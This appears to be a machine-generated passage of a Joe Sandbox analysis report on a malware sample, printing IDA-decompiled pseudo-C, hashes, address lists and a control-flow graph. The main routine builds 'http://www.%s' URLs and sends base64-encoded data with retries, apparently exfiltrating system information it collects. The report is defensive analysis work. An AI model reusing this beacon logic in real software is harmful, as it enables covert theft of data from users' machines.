                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2520000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                                          • Opcode ID: c4bf68d82b3d51c3a527826049e3f7cce7791e10676d504ed41b91a2660cc7b5
                                                                                                                                                                                                                                                                                          • Instruction ID: 4e55b5eeed70d5fe3bdf81080b392e1bcac0fecc993890d1e8429ef5b6a36da2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4bf68d82b3d51c3a527826049e3f7cce7791e10676d504ed41b91a2660cc7b5
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 780112B194431CABEB10DFD0CD49FEE7779BB44704F144158E6086B2C0E7759A48DBA5
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04001E60(CHAR* _a4) {
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v100;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0) {
                                                                                                                                                                                                                                                                                          					E04007D20(E04007D20( &_v24,  &_v24, 0, 0x10),  &_v100, 0, 0x44);
                                                                                                                                                                                                                                                                                          					_v100.cb = 0x44;
                                                                                                                                                                                                                                                                                          					if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v24) != 0) {
                                                                                                                                                                                                                                                                                          						CloseHandle(_v24.hThread);
                                                                                                                                                                                                                                                                                          						_v8 = _v24.hProcess;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                                          0x04001e66
                                                                                                                                                                                                                                                                                          0x04001e71
                                                                                                                                                                                                                                                                                          0x04001e8b
                                                                                                                                                                                                                                                                                          0x04001e93
                                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                                          0x04001ec2
                                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                                          0x04001ecb
                                                                                                                                                                                                                                                                                          0x04001ebc
                                                                                                                                                                                                                                                                                          0x04001ed4

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04001EB4
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04001EC2
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                                                                                                                          • API String ID: 3712363035-2746444292
                                                                                                                                                                                                                                                                                          • Opcode ID: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                                          • Instruction ID: 8c18c5092416b0968d1e58d42d3dcefe862203e4accbbf984a8d418911b9581a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 59bcdaf37b1f271a783006bdc6eef328790e49f0bf96139ab545fec0931b98cd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C011275A4420CABEB10DF90DD45FEE77B9AB04704F148119E6087B2C0D775AA45C7A1
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E0010E727(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				intOrPtr _t17;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t28;
                                                                                                                                                                                                                                                                                          				void* _t29;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t28 = __esi;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                                                                                                                                                                                                          				E0010E20C(__edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(E0010756D(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                                                                                                                                                                                                                          				_t17 = E0010756D(__ebx, __edx, __eflags);
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                                                                                                                                                                                                                          				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                                                                                                                                                                                                                                                                                          					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                                                                                                                                                                                                                          					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                                                                                                                                                                                                                                                          							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                                                                                                                                                                                                                                                          							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                                                                                                                                                                                                                                          								_t17 = E0010E1E5(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                                                                                                                                                                                                                                                          								_t38 = _t17;
                                                                                                                                                                                                                                                                                          								if(_t17 != 0) {
                                                                                                                                                                                                                                                                                          									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                                                                                                                                                                                                                          									_push(_t28);
                                                                                                                                                                                                                                                                                          									return E0010E4BF(_t38);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t17;
                                                                                                                                                                                                                                                                                          			}






                                                                                                                                                                                                                                                                                          0x0010e727
                                                                                                                                                                                                                                                                                          0x0010e72a
                                                                                                                                                                                                                                                                                          0x0010e730
                                                                                                                                                                                                                                                                                          0x0010e73e
                                                                                                                                                                                                                                                                                          0x0010e744
                                                                                                                                                                                                                                                                                          0x0010e74c
                                                                                                                                                                                                                                                                                          0x0010e758
                                                                                                                                                                                                                                                                                          0x0010e760
                                                                                                                                                                                                                                                                                          0x0010e768
                                                                                                                                                                                                                                                                                          0x0010e77c
                                                                                                                                                                                                                                                                                          0x0010e77e
                                                                                                                                                                                                                                                                                          0x0010e782
                                                                                                                                                                                                                                                                                          0x0010e787
                                                                                                                                                                                                                                                                                          0x0010e78d
                                                                                                                                                                                                                                                                                          0x0010e78f
                                                                                                                                                                                                                                                                                          0x0010e791
                                                                                                                                                                                                                                                                                          0x0010e794
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010e79b
                                                                                                                                                                                                                                                                                          0x0010e78f
                                                                                                                                                                                                                                                                                          0x0010e782
                                                                                                                                                                                                                                                                                          0x0010e77c
                                                                                                                                                                                                                                                                                          0x0010e768
                                                                                                                                                                                                                                                                                          0x0010e79c

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010E20C: __getptd.LIBCMT ref: 0010E212
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010E20C: __getptd.LIBCMT ref: 0010E222
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E736
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __getptd_noexit.LIBCMT ref: 00107570
                                                                                                                                                                                                                                                                                            • Part of subcall function 0010756D: __amsg_exit.LIBCMT ref: 0010757D
                                                                                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0010E744
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                                                                          • API String ID: 803148776-1018135373
                                                                                                                                                                                                                                                                                          • Opcode ID: 559c4d3561921e727d0791c19e9835df3d85783294dbdb1521c4d4501f4ffcf9
                                                                                                                                                                                                                                                                                          • Instruction ID: 9b4cf73557951b7c99d14983badcb7d6a39b8e7d97f397c483832108c605efcf
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 559c4d3561921e727d0791c19e9835df3d85783294dbdb1521c4d4501f4ffcf9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 820169349003058ADF39AF22D844AADFBF5BF24311F644D2EE4C4962D2CBB0D980CB81
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 0 4004ba0-4004bbc CoInitialize 1 40056f0-40056fc CoUninitialize 0->1 2 4004bc2-4004bff call 4007b70 SetEvent 0->2 2->1 6 4004c05-4004c0e 2->6 7 4004c10-4004c21 WaitForSingleObject 6->7 8 4004c28-4004c84 VirtualAlloc * 3 6->8 7->8 11 4004c23 7->11 9 4004c8a-4004c8e 8->9 10 40056eb 8->10 9->10 12 4004c94-4004c98 9->12 10->1 11->1 12->10 13 4004c9e-4004cbd 12->13 15 40052a2-40052b2 13->15 16 4004cc3-4004cd0 13->16 17 40052b4-40052be 15->17 18 4005325-400534e call 4008370 15->18 19 4004cd6-4004ce3 16->19 20 400529d 16->20 17->18 21 40052c0-40052d1 17->21 34 4005354-400537f lstrlenA * 2 18->34 35 40056b8-40056e5 VirtualFree * 3 18->35 22 4004ce5-4004d17 call 4006170 * 2 call 40060c0 19->22 23 4004d1c-4004d29 19->23 21->18 25 40052d3-40052dd 21->25 22->20 28 4004d62-4004d6f 23->28 29 4004d2b-4004d5d call 4006170 * 2 call 40060c0 23->29 25->18 30 40052df-4005322 call 4007b70 25->30 32 4004d71-4004da3 call 4006170 * 2 call 40060c0 28->32 33 4004da8-4004db5 28->33 29->20 30->18 32->20 42 4004db7-4004dd8 GetCurrentThreadId call 4006170 33->42 43 4004e2c-4004e39 33->43 34->35 41 4005385-40053ca wsprintfA CryptBinaryToStringA 34->41 35->10 41->35 48 40053d0-400544e MultiByteToWideChar call 40017d0 41->48 61 4004dda-4004dfb call 4006170 call 40060c0 42->61 62 4004dfd-4004e04 42->62 49 4004e72-4004e7f 43->49 50 4004e3b-4004e6d call 4006170 * 2 call 40060c0 43->50 79 4005454-400545e 48->79 80 400569b-40056a2 48->80 55 4004ee1-4004eee 49->55 56 4004e81-4004eb4 GetSystemMetrics * 2 call 4006170 49->56 50->20 68 4004f40-4004f4d 55->68 69 4004ef0-4004f13 GlobalMemoryStatus call 4006170 55->69 77 4004eb9-4004edc call 4006170 call 40060c0 56->77 76 4004e27 61->76 75 4004e06-4004e24 call 4006170 call 40060c0 62->75 62->76 73 4004f86-4004f93 68->73 74 4004f4f-4004f81 call 4006170 * 2 call 40060c0 68->74 82 4004f18-4004f3b call 4006170 call 40060c0 69->82 89 4004fd0-4004fdd 73->89 90 4004f95-4004fcb call 4006170 * 2 call 40060c0 73->90 74->20 75->76 76->20 77->20 92 4005470-4005477 79->92 93 4005460-400546a 79->93 80->35 91 40056a4-40056b2 VirtualFree 80->91 82->20 99 4005032-400503f 89->99 100 4004fdf-400502d lstrlenA call 4006170 * 2 call 40060c0 89->100 90->20 91->35 94 400551f-4005526 92->94 96 400547d-40054af VirtualFree 92->96 93->92 93->94 94->80 113 400552c-4005540 EnterCriticalSection 94->113 107 40054c0-40054c7 96->107 115 4005041-4005091 lstrlenA call 4006170 * 2 call 40060c0 99->115 116 4005096-40050a3 99->116 100->20 107->94 119 40054c9-40054f5 call 40017d0 107->119 125 4005542-4005573 VirtualAlloc call 4007b70 113->125 126 400558c-40055c1 VirtualAlloc 113->126 115->20 120 4005104-4005111 116->120 121 40050a5-40050ff lstrlenA call 4006170 * 2 call 40060c0 116->121 145 40054fa-400550d 119->145 139 4005172-400517f 120->139 140 4005113-400516d lstrlenA call 4006170 * 2 call 40060c0 120->140 121->20 151 4005578-4005587 125->151 129 40055c7-40055d8 GetTickCount 126->129 130 400568e-4005695 LeaveCriticalSection 126->130 141 40055da-400561a call 4007b70 * 2 129->141 142 400561c-4005659 call 4007b70 * 2 129->142 130->80 146 40051e0-40051ed 139->146 147 4005181-40051db lstrlenA call 4006170 * 2 call 40060c0 139->147 140->20 193 400565c-400568b VirtualFree 141->193 142->193 158 400551b 145->158 159 400550f-4005519 145->159 163 400523f-400524c 146->163 164 40051ef-400523d lstrlenA call 4006170 * 2 call 40060c0 146->164 147->20 151->130 158->94 159->158 170 400551d 159->170 163->20 168 400524e-400529a call 4009b90 call 4006170 * 2 call 40060c0 163->168 164->20 168->20 170->107 193->130
                                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                                          			E04004BA0(intOrPtr _a4) {
                                                                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                                          				signed int _v44;
                                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                                          				long _v52;
                                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                                          				char* _v60;
                                                                                                                                                                                                                                                                                          				CHAR* _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v68;
                                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                                          				int _v76;
                                                                                                                                                                                                                                                                                          				void* _v80;
                                                                                                                                                                                                                                                                                          				void* _v84;
                                                                                                                                                                                                                                                                                          				void* _v88;
                                                                                                                                                                                                                                                                                          				void* _v92;
                                                                                                                                                                                                                                                                                          				void* _v96;
                                                                                                                                                                                                                                                                                          				void* _v100;
                                                                                                                                                                                                                                                                                          				void* _v124;
                                                                                                                                                                                                                                                                                          				void* _v132;
                                                                                                                                                                                                                                                                                          				void* _v136;
                                                                                                                                                                                                                                                                                          				void* _v140;
                                                                                                                                                                                                                                                                                          				void* _v144;
                                                                                                                                                                                                                                                                                          				void* _v148;
                                                                                                                                                                                                                                                                                          				void* _v152;
                                                                                                                                                                                                                                                                                          				void* _v156;
                                                                                                                                                                                                                                                                                          				void* _v160;
                                                                                                                                                                                                                                                                                          				char _v420;
                                                                                                                                                                                                                                                                                          				CHAR* _v424;
                                                                                                                                                                                                                                                                                          				int _v428;
                                                                                                                                                                                                                                                                                          				void* _v432;
                                                                                                                                                                                                                                                                                          				long _v436;
                                                                                                                                                                                                                                                                                          				short _v948;
                                                                                                                                                                                                                                                                                          				void* _v952;
                                                                                                                                                                                                                                                                                          				void* _v956;
                                                                                                                                                                                                                                                                                          				void* _v960;
                                                                                                                                                                                                                                                                                          				void* _v964;
                                                                                                                                                                                                                                                                                          				long _v968;
                                                                                                                                                                                                                                                                                          				void* _t306;
                                                                                                                                                                                                                                                                                          				void* _t307;
                                                                                                                                                                                                                                                                                          				void* _t308;
                                                                                                                                                                                                                                                                                          				int _t312;
                                                                                                                                                                                                                                                                                          				int _t318;
                                                                                                                                                                                                                                                                                          				long _t328;
                                                                                                                                                                                                                                                                                          				void* _t333;
                                                                                                                                                                                                                                                                                          				void* _t351;
                                                                                                                                                                                                                                                                                          				long _t358;
                                                                                                                                                                                                                                                                                          				void* _t637;
                                                                                                                                                                                                                                                                                          				void* _t638;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                                          					L83:
                                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					E04007B70( &_v36, _v8, 0x1c);
                                                                                                                                                                                                                                                                                          					_t638 = _t637 + 0xc;
                                                                                                                                                                                                                                                                                          					SetEvent( *(_v8 + 0x10));
                                                                                                                                                                                                                                                                                          					_v40 = 0xea60;
                                                                                                                                                                                                                                                                                          					_v44 = _v28;
                                                                                                                                                                                                                                                                                          					while(_v44 <= _v24 && (( *(_v12 + 0x28) & 0x000000ff) != 0 || WaitForSingleObject( *(_v12 + 0x24), 0xa) != 0)) {
                                                                                                                                                                                                                                                                                          						_v64 = _v44 * 0x28 + _v36;
                                                                                                                                                                                                                                                                                          						_v52 = 0x100000;
                                                                                                                                                                                                                                                                                          						_t306 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          						_v48 = _t306;
                                                                                                                                                                                                                                                                                          						_t307 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          						_v56 = _t307;
                                                                                                                                                                                                                                                                                          						_t308 = VirtualAlloc(0, 0x100000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          						_v60 = _t308;
                                                                                                                                                                                                                                                                                          						if(_v48 == 0 || _v56 == 0 || _v60 == 0) {
                                                                                                                                                                                                                                                                                          							L82:
                                                                                                                                                                                                                                                                                          							_v44 = _v44 + 1;
                                                                                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_v68 = _v48;
                                                                                                                                                                                                                                                                                          							_v80 = 0;
                                                                                                                                                                                                                                                                                          							while(_v80 < 0x100) {
                                                                                                                                                                                                                                                                                          								_v80 = _v80 + 1;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                                          							if( *0x40118a4 == 2 &&  *((intOrPtr*)(_v16 + 0x453)) > 0 &&  *((intOrPtr*)(_v16 + 0x453)) < 0x100000 - _v72 &&  *((intOrPtr*)(_v16 + 0x457)) != 0) {
                                                                                                                                                                                                                                                                                          								 *_v68 =  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                                          								_v68 = _v68 + 4;
                                                                                                                                                                                                                                                                                          								E04007B70(_v68,  *((intOrPtr*)(_v16 + 0x457)),  *((intOrPtr*)(_v16 + 0x453)));
                                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                          								_v68 = _v68 +  *((intOrPtr*)(_v16 + 0x453));
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v72 = _v68 - _v48;
                                                                                                                                                                                                                                                                                          							_t312 = E04008370(_v48, _v72, _v56, 0x100000); // executed
                                                                                                                                                                                                                                                                                          							_t638 = _t638 + 0x10;
                                                                                                                                                                                                                                                                                          							_v76 = _t312;
                                                                                                                                                                                                                                                                                          							if(_v76 <= 0) {
                                                                                                                                                                                                                                                                                          								L81:
                                                                                                                                                                                                                                                                                          								VirtualFree(_v48, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								VirtualFree(_v56, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								VirtualFree(_v60, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          								goto L82;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_v424 = "http://www.%s";
                                                                                                                                                                                                                                                                                          								_t318 = lstrlenA(_v64);
                                                                                                                                                                                                                                                                                          								if(_t318 + lstrlenA(_v424) >= 0x100) {
                                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								wsprintfA( &_v420, _v424, _v64);
                                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                          								_v428 = 0x100000;
                                                                                                                                                                                                                                                                                          								if(CryptBinaryToStringA(_v56, _v76, 0x40000001, _v60,  &_v428) == 0) {
                                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v956 = 0;
                                                                                                                                                                                                                                                                                          								_v432 = 0;
                                                                                                                                                                                                                                                                                          								MultiByteToWideChar(1, 1,  &_v420, 0xffffffff,  &_v948, 0x100);
                                                                                                                                                                                                                                                                                          								_v952 = 0;
                                                                                                                                                                                                                                                                                          								_t328 = E040017D0( &_v420,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                                          								_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                                          								_v436 = _t328;
                                                                                                                                                                                                                                                                                          								if(_v436 <= 0) {
                                                                                                                                                                                                                                                                                          									L79:
                                                                                                                                                                                                                                                                                          									if(_v956 != 0) {
                                                                                                                                                                                                                                                                                          										VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L81;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_v436 < 0x100 || _v952 >= 0x1f4) {
                                                                                                                                                                                                                                                                                          									if( *0x40118a4 != 1) {
                                                                                                                                                                                                                                                                                          										goto L70;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									VirtualFree(_v956, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          									_v956 = 0;
                                                                                                                                                                                                                                                                                          									_v432 = 0;
                                                                                                                                                                                                                                                                                          									_v960 = 0;
                                                                                                                                                                                                                                                                                          									while(_v960 < 4) {
                                                                                                                                                                                                                                                                                          										_t358 = E040017D0(_v428,  &_v420, _v60, _v428,  &_v956,  &_v432, 0xea60,  &_v952); // executed
                                                                                                                                                                                                                                                                                          										_t638 = _t638 + 0x1c;
                                                                                                                                                                                                                                                                                          										_v436 = _t358;
                                                                                                                                                                                                                                                                                          										if(_v436 > 0x100 || _v952 < 0x1f4) {
                                                                                                                                                                                                                                                                                          											goto L70;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_v960 = _v960 + 1;
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L70;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									L70:
                                                                                                                                                                                                                                                                                          									if(_v436 > 0) {
                                                                                                                                                                                                                                                                                          										EnterCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                                          										if( *(_v12 + 4) != 0) {
                                                                                                                                                                                                                                                                                          											_v968 =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                                          											_t333 = VirtualAlloc(0, _v968, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          											_v964 = _t333;
                                                                                                                                                                                                                                                                                          											if(_v964 != 0) {
                                                                                                                                                                                                                                                                                          												if(GetTickCount() % 2 != 0) {
                                                                                                                                                                                                                                                                                          													E04007B70(_v964, _v956, _v436);
                                                                                                                                                                                                                                                                                          													E04007B70(_v964 + _v436,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                                                                                                          													E04007B70(_v964,  *(_v12 + 4),  *(_v12 + 8));
                                                                                                                                                                                                                                                                                          													E04007B70(_v964 +  *(_v12 + 8), _v956, _v436);
                                                                                                                                                                                                                                                                                          													_t638 = _t638 + 0x18;
                                                                                                                                                                                                                                                                                          												}
                                                                                                                                                                                                                                                                                          												 *(_v12 + 8) =  *(_v12 + 8) + _v436;
                                                                                                                                                                                                                                                                                          												VirtualFree( *(_v12 + 4), 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                          												 *(_v12 + 4) = _v964;
                                                                                                                                                                                                                                                                                          											}
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          											_t351 = VirtualAlloc(0, _v436, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                          											 *(_v12 + 4) = _t351;
                                                                                                                                                                                                                                                                                          											E04007B70( *(_v12 + 4), _v956, _v436);
                                                                                                                                                                                                                                                                                          											_t638 = _t638 + 0xc;
                                                                                                                                                                                                                                                                                          											 *(_v12 + 8) = _v436;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										LeaveCriticalSection(_v12 + 0xc);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L79;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L83;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
























































                                                                                                                                                                                                                                                                                          0x04004bac
                                                                                                                                                                                                                                                                                          0x04004bb5
                                                                                                                                                                                                                                                                                          0x04004bbc
                                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                                          0x040056f0
                                                                                                                                                                                                                                                                                          0x040056fc
                                                                                                                                                                                                                                                                                          0x04004bc2
                                                                                                                                                                                                                                                                                          0x04004bcc
                                                                                                                                                                                                                                                                                          0x04004bd1
                                                                                                                                                                                                                                                                                          0x04004bdb
                                                                                                                                                                                                                                                                                          0x04004be1
                                                                                                                                                                                                                                                                                          0x04004beb
                                                                                                                                                                                                                                                                                          0x04004bf9
                                                                                                                                                                                                                                                                                          0x04004c31
                                                                                                                                                                                                                                                                                          0x04004c34
                                                                                                                                                                                                                                                                                          0x04004c49
                                                                                                                                                                                                                                                                                          0x04004c4f
                                                                                                                                                                                                                                                                                          0x04004c60
                                                                                                                                                                                                                                                                                          0x04004c66
                                                                                                                                                                                                                                                                                          0x04004c77
                                                                                                                                                                                                                                                                                          0x04004c7d
                                                                                                                                                                                                                                                                                          0x04004c84
                                                                                                                                                                                                                                                                                          0x040056eb
                                                                                                                                                                                                                                                                                          0x04004bf6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04004c9e
                                                                                                                                                                                                                                                                                          0x04004ca1
                                                                                                                                                                                                                                                                                          0x04004ca4
                                                                                                                                                                                                                                                                                          0x04004cb6
                                                                                                                                                                                                                                                                                          0x04004cb3
                                                                                                                                                                                                                                                                                          0x04004cb3
